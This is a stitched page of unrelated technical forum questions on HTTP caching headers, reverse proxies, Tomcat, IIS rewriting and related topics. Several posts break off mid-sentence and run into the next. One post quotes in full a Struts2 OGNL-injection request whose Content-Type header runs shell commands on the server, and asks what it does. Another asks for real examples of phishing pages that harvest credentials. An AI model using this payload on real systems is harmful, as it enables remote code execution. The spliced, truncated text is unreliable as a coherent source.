HTTP Protocol

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text. HTTP is the protocol to exchange or transfer hypertext. HTTP functions as a request-response protocol in the client-server computing model. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet Protocol Suite; it presumes an underlying and reliable transport layer protocol.

I'm trying to configure Pound Reverse Proxy with an HTTPS connection to a web server in the backend. Unfortunately it does not work; with unencrypted HTTP it works. Syslog says:
Jun  8 11:11:39 transfer pound: BIO_do_handshake with XXX.XXX.XXX.XXX:443 failed: error:00000000:lib(0):func(0):reason(0)
openssl s_client -connect example.com:443 says "CONNECTION OK".

The used config part of Pound:

 ListenHTTPS
        HeadRemove "X-Forwarded-Proto"
        AddHeader "X-Forwarded-Proto: https"
        Address YYY.YYY.YYY.YYY
        Port    443
        Cert    "/etc/ssl/pound/server.pem"

        ## allow PUT and DELETE also (by default only GET, POST and HEAD)?:
        xHTTP           1

        Service
                BackEnd
                        Address XXX.XXX.XXX.XXX
                        Port    443
                        HTTPS
                End
        End

I've been surfing the net for several hours with no solution, so I thought "maybe experts exchange can help"?
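Two things worth ruling out here (both are assumptions on my part, not something that empty error string proves): the backend may require SNI, which some proxy builds do not send on backend connections, or it may only accept TLS versions the proxy does not offer. Depending on the OpenSSL version, s_client sends SNI by default, so its "CONNECTION OK" does not rule the first case out. A quick stdlib-Python sketch to compare handshakes with and without SNI:

```python
# Diagnostic sketch: attempt a TLS handshake with and without SNI.
# The host below is a placeholder; substitute the backend's address.
import socket
import ssl

def handshake(host, port=443, send_sni=True):
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # diagnosis only: skip certificate checks
    server_hostname = host if send_sni else None
    try:
        with socket.create_connection((host, port), timeout=5) as sock:
            with ctx.wrap_socket(sock, server_hostname=server_hostname) as tls:
                return "OK: " + str(tls.version())
    except (ssl.SSLError, OSError) as exc:
        return "FAILED: %r" % exc

if __name__ == "__main__":
    print(handshake("example.com", send_sni=True))
    print(handshake("example.com", send_sni=False))
```

If the no-SNI handshake fails where the SNI one succeeds, the backend (or a TLS device in front of it) is rejecting SNI-less clients, and the fix lies in the proxy's backend TLS settings rather than in the certificate.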


****** edit #1 a few hours later ******

I sniffed the traffic between the reverse proxy and the HTTPS backend server. I added a screen capture. It seems that the web server just does not answer; then Pound runs into a timeout and closes the connection, but I'm not an expert. I've tried to put Pound in front of several web servers, with the same effect. I assume that they dislike something in the "handshake-request-packet", but I have no clue what, because I get no …

My question is about this part of the HTTP/1.1 Caching protocol, see:
https://tools.ietf.org/html/rfc7234#page-17 (Handling a Received Validation Request)

A request containing an If-None-Match header field (Section 3.2 of [RFC7232]) indicates that the client wants to validate one or more of its own stored responses in comparison to whichever stored response is selected by the cache.

When a cache decides to revalidate its own stored responses for a request that contains an If-None-Match list of entity-tags, the cache MAY combine the received list with a list of entity-tags from its own stored set of responses (fresh or stale) and send the union of the two lists as a replacement If-None-Match header field value in the forwarded request.

If the response to the forwarded request is 304 (Not Modified) and has an ETag header field value with an entity-tag that is not in the client's list, the cache MUST generate a 200 (OK) response for the client by reusing its corresponding stored response, as updated by the 304 response metadata (Section 4.3.4).

Let's assume we have:

  • A browser cache.
  • A proxy cache.
  • An origin server.

The browser cache contains a stored stale resource with entity-tag "A". The proxy cache contains a stored stale resource with entity-tag "B". The proxy cache can act as a client and as a server. The entity-tag of the resource on the origin server is also "A".
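To make the quoted rules concrete for this exact scenario, here is a toy sketch (plain Python, no real HTTP; all function and variable names are made up for illustration):

```python
# Sketch of RFC 7234 section 4.3.2: a shared cache combining If-None-Match
# entity-tags before forwarding, then deciding between 304 and 200.

def origin(request_inm, origin_etag, origin_body):
    """Origin returns 304 if its current entity-tag is in If-None-Match."""
    if origin_etag in request_inm:
        return {"status": 304, "etag": origin_etag}
    return {"status": 200, "etag": origin_etag, "body": origin_body}

def proxy_revalidate(client_inm, stored_etag, stored_body, origin_etag, origin_body):
    # The cache MAY combine the client's list with its own stored entity-tags.
    forwarded_inm = set(client_inm) | {stored_etag}
    resp = origin(forwarded_inm, origin_etag, origin_body)
    if resp["status"] == 304:
        if resp["etag"] in client_inm:
            # The client's own copy is still valid: forward the 304.
            return {"status": 304, "etag": resp["etag"]}
        # The 304 matches only the proxy's copy: the client needs a body,
        # so the cache MUST generate a 200 from its stored response.
        return {"status": 200, "etag": stored_etag, "body": stored_body}
    return resp

# Scenario from the question: browser has "A", proxy has "B", origin has "A".
print(proxy_revalidate(["A"], "B", b"proxy copy", "A", b"origin copy")["status"])  # 304
# If the origin's tag were "B" instead, the proxy would serve its own copy:
print(proxy_revalidate(["A"], "B", b"proxy copy", "B", b"origin copy")["status"])  # 200
```

In the first case the proxy really does "forward" the origin's 304; in the second it answers 200 itself from storage.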


See: https://tools.ietf.org/html/rfc7232#page-19 (304 Not Modified)

If the conditional request originated with an outbound client, such as a user agent with its own cache sending a conditional GET to a shared proxy, then the proxy SHOULD forward the 304 response to that client.

I don't understand this part of the protocol. The word "forward" implies that the proxy got the 304 response from somewhere else in the first place. I would think that the proxy creates the 304 response and doesn't forward it? How should I interpret this quote? Where does the 304 response come from in the first place?


Imagine you have:

user agent   <->   browser cache   <->   proxy cache   <->   origin server   



In my opinion, this is what will happen:

  1. The user agent initiates the request.
  2. The browser cache adds, for example, an If-None-Match (ETag) header to the request.
  3. The proxy cache receives this request.
  4. If the proxy cache contains a valid response, and the entity-tags are the same, then a 304 response will be created by the proxy cache.
  5. The 304 response will be sent to the browser cache and the user agent.

This is not a forward, so where does the word "forward" come from?

If the origin server had created the 304 response, then a proxy server could receive and forward this response. However, I don't think you have to see it like that. Imagine the entity-tag …
Hi, I am sending an email blast, and in each email I connect every button with a user id, so if a user who gets the email clicks a button, the click can be recorded. For example, a button link looks like this:
http://www.Testweb.com/Pages/EmailBlast/Email.aspx?Id=1&page=www.Testweb.com/Pharmaceutical_Packaging__Details.aspx

Previously I was using the 3.5 framework and it was working fine, but after switching to framework 4.0, instead of going to the page Email.aspx it tries to go to www.Testweb.com/Pharmaceutical_Packaging__Details.aspx. FYI, I am doing URL rewriting as well.

How can I fix this problem? To work around it I had to remove the domain prefix from the page parameter; when I call the page like below, it works:
http://www.Testweb.com/Pages/EmailBlast/Email.aspx?Id=1&page=Pharmaceutical_Packaging__Details.aspx


  Please help
In Android 6.0, using SDK 25, should java.net.HttpURLConnection be obeying the system properties http.keepAlive and http.maxConnections?

With netstat, I can verify that in the system there are 2 TCP connections continuously open to my server. These connections appear to be neatly reused for HTTP keep alive and they appear when I start the player, disappear when I stop the player. I am using ExoPlayer for live dash streaming (player is downloading approx 3-5 files every 10 seconds from the same server, audio chunk, video chunk and manifest).

But the underlying system seems to ignore the http.maxConnections (and even http.keepAlive) that I wish to control.

My goal is to set http.maxConnections to 1 and ensure there is exactly 1 HTTP keep alive (TCP) connection open to the server. Any way to accomplish this?
See: https://blogs.msdn.microsoft.com/ieinternals/2009/07/20/internet-explorers-cache-control-extensions/

Generally, the pre-check directive is very similar to max-age. However, IE's implementation of max-age takes the Age response header into account. In contrast, the implementation of post-check and pre-check do not. Hence, pre-check is equivalent to max-age only when there is no Age header on the response.

This article is from 2009, so it's pretty old. How are max-age and the Age header related nowadays? Or are they not related at all anymore?
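As far as RFC 7234 (section 4.2) goes, they are still related in the standard way: a stored response is fresh while its freshness lifetime (e.g. max-age) exceeds its current age, and an Age header received with the response counts toward that current age. A minimal sketch of that relation (illustrative only, function name is made up):

```python
def is_fresh(max_age, received_age, seconds_in_cache):
    """RFC 7234 sketch: response_is_fresh = freshness_lifetime > current_age.
    received_age is the value of the Age header on the stored response
    (0 if absent); seconds_in_cache is time since the cache received it."""
    current_age = received_age + seconds_in_cache
    return max_age > current_age

print(is_fresh(max_age=60, received_age=0, seconds_in_cache=30))   # True
print(is_fresh(max_age=60, received_age=45, seconds_in_cache=30))  # False
```

So an implementation that ignores Age (as IE's pre-check reportedly did) treats a response that already sat 45 seconds in an upstream cache as brand new.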
My question is about one specific reason to use max-age over Expires.

See for example: https://www.mnot.net/cache_docs/#EXPIRES
Although the Expires header is useful, it has some limitations. First, because there’s a date involved, the clocks on the Web server and the cache must be synchronised; if they have a different idea of the time, the intended results won’t be achieved, and caches might wrongly consider stale content as fresh.

But with max-age you also have the exact same problem, right? In my opinion there are 2 possibilities:

1. A cache receives a response from a server. The cache's clock starts counting from that moment. If there were a delay between the server sending the response and the cache receiving it, the age would be incorrect. So this is not a good way to calculate the age.

2. A cache receives a response from a server. The age of the response is calculated as a difference between the cache's current date and the Date general header included in the HTTP response.

Case 2 is in my opinion the right way to calculate the age of the response. But the response header field "Date" will be determined by the server, just like "Expires" will be determined by the server. So in both cases the server's clock will be compared with the cache's clock. So in this respect (clock synchronization), I see no difference between max-age and Expires?

With case 1 they would be right, because then the cache's clock on moment A …
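For what it's worth, RFC 7234 section 4.2.3 combines both of the cases described above: a cache takes the larger of the Date-based estimate (case 2) and a delay-corrected Age value (closer to case 1), precisely to be robust against clock skew. Roughly:

```python
def corrected_initial_age(date_value, request_time, response_time, age_value=0):
    """Sketch of RFC 7234 section 4.2.3 (all times in seconds)."""
    apparent_age = max(0, response_time - date_value)  # clock-comparison estimate
    response_delay = response_time - request_time      # bound on network delay
    corrected_age_value = age_value + response_delay   # Age header, corrected
    return max(apparent_age, corrected_age_value)

# Server clock 10 s behind the cache: apparent_age is inflated by 10 s,
# but it is clamped at 0 in the opposite direction, and the Age-based
# path keeps the estimate sane when Date is unusable.
print(corrected_initial_age(date_value=990, request_time=999, response_time=1000))  # 10
```

So the spec does not trust either clock fully; the max() of the two estimates errs on the side of treating content as older (staler) than it might be, which is the safe direction for a cache.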
When a stored response is used to satisfy a request without validation, my browser is not showing me the HTTP response header field "Age". Why not?

Just take a simple test.html file, which is cacheable by default. Now visit the page 2 times, so the second time the file is shown directly from cache without validation.

Firefox shows me response headers like this:

Date: Mon, 12 Mar 2018 16:05:18 GMT
Server: Apache/2.4.17 (Unix) OpenSSL/1.0.1e-fips PHP/5.6.16
Last-Modified: Mon, 12 Mar 2018 12:24:12 GMT
Accept-Ranges: bytes
Content-Length: 143
Content-Type: text/html



But why does Firefox not show me the "Age" header field?

See: https://tools.ietf.org/html/rfc7234

When a stored response is used to satisfy a request without validation, a cache MUST generate an Age header field

And see: https://tools.ietf.org/html/rfc7234#section-5.1

However, lack of an Age header field does not imply the origin was contacted, since the response might have been received from an HTTP/1.0 cache that does not implement Age.

A browser's cache is not HTTP/1.0, so the response headers must contain an Age header field. Yet Firefox is not showing me "Age"?

Are browsers only showing the response and request headers of the server? But if that's the case, then they would show no response headers at all, because there was no response from the server in the case of "200 OK (cached)"?

So I don't understand this. What's the logic behind it?

P.S. The example was about Firefox, but for example Chrome is doing the same.
See: http://php.net/manual/en/function.session-cache-limiter.php

PHP is using:

Expires: Thu, 19 Nov 1981 08:52:00 GMT



I don't understand this 100%. A cache could have a different idea about time. Although it's really rare, a cache could think it's 1980. In a case like that, the cached copy will be seen as fresh.

When using:

Expires: 0



you can avoid problems like that. So in my opinion PHP is choosing the second best solution instead of the best solution.

See: https://tools.ietf.org/html/rfc7234#section-5.3

A cache recipient MUST interpret invalid date formats, especially the
value "0", as representing a time in the past (i.e., "already
expired").

So when using the value "0", you know for sure it will be seen as a date in the past. But this is the protocol for HTTP/1.1 (not HTTP/1.0).

I was also searching for some information about HTTP/1.0 and invalid dates, but I could not find an answer. I know HTTP/1.0 CAN implement things from HTTP/1.1.

How do HTTP/1.0 caches deal with invalid dates? And can I be sure that in all situations "Expires: 0" will be seen as a date in the past? If not, do you have examples?

I saw Google is using:

Expires: -1



In the past people were setting Expires via HTML via the meta tag ... in cases like that "-1" could mean something different from "0", but in what kind of situations does "Expires: -1" mean something different from "Expires: 0" in the HTTP headers?

So what to use? Date in the past, 0 or -1?
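For HTTP/1.1 recipients, at least, "0", "-1" and any other unparseable value all collapse to the same thing. A sketch of the lenient parsing RFC 7234 section 5.3 prescribes (using Python's stdlib date parser as a stand-in for a real HTTP-date parser):

```python
from email.utils import parsedate_to_datetime
from datetime import datetime, timezone

def parse_expires(value, now):
    """RFC 7234 section 5.3 sketch: invalid dates (including "0") mean
    already expired. A real cache also applies Cache-Control, which
    takes precedence over Expires."""
    try:
        return parsedate_to_datetime(value)
    except (TypeError, ValueError):
        return now  # treat as a time in the past: already expired

now = datetime.now(timezone.utc)
print(parse_expires("Thu, 19 Nov 1981 08:52:00 GMT", now).year)  # 1981
print(parse_expires("0", now) <= now)   # True
print(parse_expires("-1", now) <= now)  # True
```

As far as I can tell, RFC 1945 (section 10.7) contains essentially the same rule for HTTP/1.0 ("0" and other invalid formats mean already expired), but whether every old implementation honored it is hard to guarantee; that is presumably why a valid far-past date like PHP's remains the most conservative choice.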
I'm trying to understand:

Vary: Accept-Encoding



Let's say we have:

- client 1 (only understands gzip-encoding)
- client 2 (only understands deflate-encoding)
- a shared cache
- a server (supports gzip and deflate encoding / compression, so the server can send the response message body encoded / compressed)
- a resource (1 url, cacheable)

If client 1 makes the first request for the resource, the response will be stored in cache. The resource is gzip-encoded. If client 2 then makes a request, the cache will serve the gzip-encoded version, which client 2 does not understand.

This is what I understand about it from the internet. But this sounds weird to me.

1. The stored response in cache must contain "Content-Encoding: gzip", because when a server sends an encoded response, it lets you know which encoding has been used. So suppose I were a cache and I got a request with "Accept-Encoding: deflate" (or with an empty value). As a cache I know that my stored response is gzip-encoded (because of the stored "Content-Encoding: gzip"). Then I don't need "Vary: Accept-Encoding" to know that I have to make a new request to the server??

So why "Vary: Accept-Encoding" exists anyway and in what kind of situations it really makes a difference?

2. Are there also caches around which can decode / encode (gzip / deflate)? In cases like that there is also no need to add "Vary: Accept-Encoding", because a cache could decode …
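Here is a toy model of what Vary buys a cache (plain Python, no real HTTP; all names are made up). Without Vary, a cache has no license to use arbitrary request headers as part of its cache key; Vary is the server declaring which request headers form the secondary cache key (RFC 7234 section 4.1), so the cache can store several variants and match them mechanically:

```python
# Toy cache: one list of stored variants per URL. Illustrative only.
cache = {}

def store(url, request_headers, response):
    vary = [h.strip().lower() for h in response.get("Vary", "").split(",") if h.strip()]
    # Remember the request-header values this variant was selected by.
    selecting = {h: request_headers.get(h, "") for h in vary}
    cache.setdefault(url, []).append((selecting, response))

def lookup(url, request_headers):
    for selecting, response in cache.get(url, []):
        if all(request_headers.get(h, "") == v for h, v in selecting.items()):
            return response
    return None  # miss: forward the request to the origin

gzip_resp = {"Vary": "Accept-Encoding", "Content-Encoding": "gzip", "body": b"..."}
store("/page", {"accept-encoding": "gzip"}, gzip_resp)

print(lookup("/page", {"accept-encoding": "gzip"}) is gzip_resp)  # True: hit
print(lookup("/page", {"accept-encoding": "deflate"}) is None)    # True: miss
```

The Content-Encoding heuristic in question 1 happens to work for this one header, but Vary generalizes to headers the cache cannot reason about on its own (Accept-Language, User-Agent, custom headers), without the cache needing to understand their semantics.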

If you have, for example, an image with max-age=31536000, what is the best thing to do when using HTTPS:

1:
Cache-Control: public, max-age=31536000



2:
Cache-Control: private, max-age=31536000



3:
Cache-Control: max-age=31536000



Which one and why?


I also did some research of my own, but I'm not sure yet what the answer should be. I think this is true:

By default web browsers should cache content over HTTPS the same as over HTTP, unless explicitly told otherwise via the HTTP Headers received.

This is about the cache of the browser. For shared caches I think this is true:

If the request is authenticated or secure (i.e., HTTPS), it won’t be cached by shared caches.

Google is saying here, see: https://developers.google.com/web/fundamentals/performance/optimizing-content-efficiency/http-caching

If the response is marked as "public", then it can be cached, even if it has HTTP authentication associated with it, and even when the response status code isn't normally cacheable. Most of the time, "public" isn't necessary, because explicit caching information (like "max-age") indicates that the response is cacheable anyway.

That's what Google is saying, but I also checked what they are doing. See:

Example: https://www.google.nl/images/branding/googlelogo/2x/googlelogo_color_120x44dp.png
cache-control:private, max-age=31536000



Example: https://www.google.com/textinputassistant/tia.png
cache-control:public, max-age=31536000


Response headers can contain something like:

Cache-Control: must-revalidate



But "must-revalidate" does not exist for the request headers, see:

https://tools.ietf.org/html/rfc7234.html#section-5.2.1

Why? Is there a reason behind this?

Take, for example, me, my browser, my browser's cache and the origin server. Let's say there is a stale cached copy in the browser's cache. Imagine I don't want the cached copy to be served without any request being made to the server, not even if the cache is disconnected from the origin server. I would add must-revalidate to the request headers, but this directive only exists for the response headers.

Why is that and what's behind it? Directives like max-age, no-cache and no-store exist for both the response AND the request, so why is must-revalidate an exception to that?
Let's first take a look at the definitions.

1. Max-age in request headers:
See: https://tools.ietf.org/html/rfc7234.html#section-5.2.1

The "max-age" request directive indicates that the client is
unwilling to accept a response whose age is greater than the
specified number of seconds.  Unless the max-stale request directive
is also present, the client is not willing to accept a stale
response.

2. Max-age in the response headers:
See: https://tools.ietf.org/html/rfc7234.html#page-26

The "max-age" response directive indicates that the response is to be
considered stale after its age is greater than the specified number
of seconds.

And see: https://tools.ietf.org/html/rfc7234#section-4.2.4

A cache MUST NOT send stale responses unless it is disconnected
(i.e., it cannot contact the origin server or otherwise find a
forward path)

So is it true that "max-age=0" in the response headers is NOT equivalent to "no-cache" in the response headers (because of the disconnected case), BUT "max-age=0" in the request headers IS equivalent to "no-cache" in the request headers?

3. No-cache in the request headers:
See: https://tools.ietf.org/html/rfc7234.html#page-23

The "no-cache" request directive indicates that a cache MUST NOT use
a stored response to satisfy the request without successful
validation on the origin server.

4. No-cache in the response headers:
See: https://tools.ietf.org/html/rfc7234#section-5.2.2
Dear sirs,
I am setting up a global exception handler in Spring. Once an exception is caught, a method in the @ControllerAdvice is called and returns a specific view with exception details. Among the info returned with the view I have the HttpStatus that I can get. Actually I keep getting 200, while the right HttpStatus should be 500, 404, etc.
Here is my code
@ControllerAdvice
@Slf4j
public class AppGlobalExceptionHandler {
      /*
       * Note: You can either point to Exception Types or Http ResponseStatus
       * @ExceptionHandler({MyException.class})
       * public String ...
       *
       * @ExceptionHandler
       * @ResponseStatus(HttpStatus.INTERNAL_SERVER_ERROR)
       * public String
       * */
      
      @ExceptionHandler
      public String handleAnyException(Exception exception, Model model,
                  HttpServletRequest request, HttpServletResponse response) {
            
            log.error("Request raised " + exception.getClass().getSimpleName());
            
            String details = ExceptionUtils.getStackTrace(exception);
            
            AppError error = new AppError();
            error.setStatus(response.getStatus());
            error.setUrl(String.valueOf(request.getRequestURL()));
            error.setMessage(exception.getMessage());
            error.setDetails(details);
            
            model.addAttribute(AppStringHandler.VARIABLE_URL_SUBMIT, AppStringHandler.URL_TASKS_SEND_EMAIL_500);
            model.addAttribute(AppStringHandler.VARIABLE_URL_REDIRECT, AppStringHandler.URL_ADMIN_REDIRECT);
            model.addAttribute(AppStringHandler.VIEW_ERROR_MODEL_ATTRIBUTE, error);
            
            …
Our mobile app is experiencing a strange behavior in a place where they have WiFi. If the app uses THAT WiFi there's an HTTP POST request (to our API) that gets the response content truncated randomly (not always truncated, and if truncated not always at the same place).

I made several tests at that place (using the app and also Postman) and found that on mobile data the response always comes OK, but when connecting with that WiFi the response sometimes gets truncated. Also, I saw that other API requests get the response correctly, even when the content length is 10 times bigger (I thought that maybe the response was too big, but we're talking about just 10Kb).

The failing request is a regular POST request sent to a REST API made with Dropwizard. The request gets processed correctly on the server, which returns status 200 and the content. The client gets the status 200 but the content is truncated, so the whole operation can't be finished.

I wonder if there's something wrong with that WiFi, or if this kind of response error must be expected and dealt with by our application. I haven't seen this behavior before.
I want to create an IIS URL rewrite rule which should make the site respond with the same content on any request. This rule is to be applied when the site goes under maintenance.
My rule looks like the following:
        <rewrite>
            <rules>
                <rule name="Stub" enabled="true" patternSyntax="ECMAScript" stopProcessing="true">
                    <match url=".*" />
                    <action type="Rewrite" url="/maintenance.htm?URL={R:0}" appendQueryString="true" logRewrittenUrl="true" />
                    <conditions>
                        <add input="{REMOTE_ADDR}" pattern="127.0.0.1" negate="true" />
                        <add input="{REMOTE_ADDR}" pattern="172.31.3" negate="true" />
                    </conditions>
                </rule>
            </rules>
        </rewrite>        


It works perfectly for any request to resources in the root folder. But on any request to a sub-directory the server responds with 403 Forbidden

For example, a request like http://mysite.com/s.gif correctly returns the content of the file maintenance.htm (located in the site's root folder), but a request like http://mysite.com/2/s.gif  returns
 <h2>403 - Forbidden: Access is denied.</h2>
  <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>


(there is a file /2/s.gif and it is correctly returned when the rule is disabled).
In the W3SVC log file I can see:
2017-12-20 22:01:36 172.31.34.109 GET /maintenance.htm URL=2/s.gif 443 - 173.161.245.141 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:52.0)+Gecko/20100101+Sea-Monkey/2.49.1+(similar+to+Firefox/52.0) - 403 18 0 78


Please help.
My question is about: https://www.mnot.net/blog/2007/05/15/expires_max-age

They're saying:

The problem with that line of reasoning is that HTTP versions aren’t black and white like this; just because something advertises itself as HTTP/1.0, doesn’t mean it doesn’t understand HTTP/1.1 (see RFC2145 for more).

But here they are saying:

https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9.3

If a response includes both an Expires header and a max-age directive, the max-age directive overrides the Expires header, even if the Expires header is more restrictive. This rule allows an origin server to provide, for a given response, a longer expiration time to an HTTP/1.1 (or later) cache than to an HTTP/1.0 cache.

So either the article is incorrect, or W3 is incorrect (or I'm wrong :p). With the last sentence, W3 means you can give a different expiration time to an HTTP/1.1 cache (or later) compared with an HTTP/1.0 cache. You can do this by using max-age and the Expires header.
They can only say something like that by assuming the HTTP/1.0 cache will ignore max-age, because otherwise you would just have the same expiration time for all caches (HTTP/1.0 and HTTP/1.1 et cetera).

So what is true about HTTP/1.0 caches understanding max-age?
Experts,

In this sample GET request

GET / HTTP/1.1
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Accept: */*
Referer: http://108.100.150.170:80/
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 108.100.150.170
Connection: Keep-Alive

 Questions:
The Content-Type begins with something that is not normal. Is it trying to get the web server to process it and execute something? I also see java.lang, so it is trying to call a Java function. What is it trying to do with Java?

What is it doing with the Windows command prompt and the bash shell command prompt?

What is the purpose of echoing "Struts2045"?
This is a great video (however the links no longer work):
https://www.youtube.com/watch?v=Usydlsc2uWE
I need a real-life example of how, if someone clicks on a bad link via email or whatever avenue, the redirected website collects their credentials. Anyone have any good ones?

TIA!!

Hello, does anyone know how to transfer iPhone contacts and messages to an Android phone without any loss? I've tried many ways to transfer them, but they always fail, and I don't know how to connect the two different phones.
Please help.
Hi,
how can I disable HTTPS and enable HTTP on Apache Tomcat?
Based on my research I have to modify the server.xml in the root folder of Apache Tomcat. Must I modify the connector? How?
My web application connects to port 8443.
<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<!-- Note:  A "Server" is not itself a "Container", so you may not
     define subcomponents such as "Valves" at this level.
     Documentation at /docs/config/server.html
 -->
<Server port="-1" shutdown="SHUTDOWN">
  <!-- Security listener. Documentation at /docs/config/listeners.html
  <Listener className="org.apache.catalina.security.SecurityListener" />
  -->
  <!--APR library loader. Documentation at 

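For reference, a plain-HTTP connector in server.xml typically looks like the sketch below (the attribute values are examples, and exact defaults vary by Tomcat version). Disabling HTTPS then usually amounts to removing or commenting out the Connector that carries the SSL/secure attributes (the one on 8443) and pointing the application at the plain port instead:

```xml
<!-- Sketch: plain HTTP on port 8080 (example values, not a drop-in config) -->
<Connector port="8080" protocol="HTTP/1.1"
           connectionTimeout="20000"
           redirectPort="8443" />
```

If HTTPS is removed entirely, the redirectPort attribute (which only matters for redirecting requests that require a secure channel) can be dropped as well.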

How to display HTML detail when clicking submit? Pls
In Internet Explorer I am able to access an HTTPS site and download a file. I have to use a username and password to access the site first.
However, when I enter the URL and credentials in SSIS using the HTTP connection manager and press the test connection button, I get the message:

The remote server returned an error: (401) Unauthorized.

Any ideas why this is happening? The username and password are correct.

Can I use an HTTPS site in an HTTP connection?

Any help appreciated.

Thanks
I have used 3 sets of code (where I used the Indy 10.6.2 component), which don't show any errors, but I am not able to send an SMS through the code. Please help me send an SMS through Delphi code.

The code which I used is...

const
  URL = 'https://api.bulksmsgateway.in/send/?username=****&hash=****&sender=TXTLCL&numbers=9198........&message=HISUNDAR';
  //URL = 'https://api.textlocal.in/send/?username=*****&hash=******&sender=TXTLCL&numbers=9198...&message=HISUNDAR';
  ResponseSize = 1024;
var
  hSession, hURL: HInternet;
  Request: String;
  ResponseLength: Cardinal;
begin
  hSession := InternetOpen('TEST', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
  try
    Request := Format(URL,[Username,Password,Sender,Numbers,HttpEncode(Message1)]);
    hURL := InternetOpenURL(hSession, PChar(Request), nil, 0,0,0);
    try
      SetLength(Result, ResponseSize);
      InternetReadFile(hURL, PChar(Result), ResponseSize, ResponseLength);
      SetLength(Result, ResponseLength);
    finally
      InternetCloseHandle(hURL)
    end;
    showmessage(result);
  finally
    InternetCloseHandle(hSession)
  end





var
http : TIdHTTP;
IdSSL : TIdSSLIOHandlerSocketOpenSSL;
begin
 http := TIdHTTP.Create(nil);
 IdSSL := TIdSSLIOHandlerSocketOpenSSL.Create(nil);
 try
  Http.ReadTimeout := 30000;
  Http.IOHandler := IdSSL;
  IdSSL.SSLOptions.Method := sslvTLSv1;
  Http.Request.BasicAuthentication := True;
 // IdSSL.SSLOptions.Method := sslvTLSv1;
  …
I am using the following query to get the CNAME record to load my site properly. The issue: The code below works ... but only if refreshed a couple of times.

Query ::

$recsDNS = dns_get_record($_SERVER['HTTP_HOST'], DNS_CNAME );
print_r($recsDNS);

I am not getting the CNAME records properly; sometimes they come and sometimes not.

If I use DNS_ALL, after refreshing 3 to 4 times I get the CNAME records.
